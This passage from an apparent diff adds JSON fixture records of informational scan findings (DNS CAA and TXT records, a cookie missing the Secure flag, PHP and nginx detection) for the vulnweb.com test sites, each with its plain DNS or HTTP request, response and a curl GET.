SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1797\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 235, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.572Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 35249\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 35249\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 236, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.678Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53372\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53372\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 237, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\", \"\\\"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.773Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42471\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42471\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\nvulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\nvulnweb.com.\t3600\tIN\tTXT\t"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 238, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.866Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 33315\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 33315\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\nwww.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 239, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/cookies-without-secure.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/cookies-without-secure", + "template_id": "cookies-without-secure", + "matcher_name": "", + "name": "Cookies without Secure attribute - Detect", + "severity": 0, + "description": "Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://owasp.org/www-community/controls/SecureCookieAttribute']", + "cvss_metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/logout", + "discovered_date": "2024-11-13T02:34:55.966Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 302 FOUND\r\nConnection: close\r\nContent-Length: 265\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nLocation: http://testhtml5.vulnweb.com/\r\nServer: nginx/1.19.0\r\nSet-Cookie: username=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/\r\n\r\n", + "is_llm_used": false, + "tags": [ + 6, + 7, + 8, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 240, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:34:56.100Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:48 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 241, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:34:56.192Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:48 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 242, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:34:56.277Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:51 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 243, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:34:56.350Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 244, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:34:56.435Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 245, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:34:56.535Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 246, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:56.662Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 29402\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 29402\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1789\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 247, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:34:56.749Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 248, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:34:56.816Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 249, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:34:56.887Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 250, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) 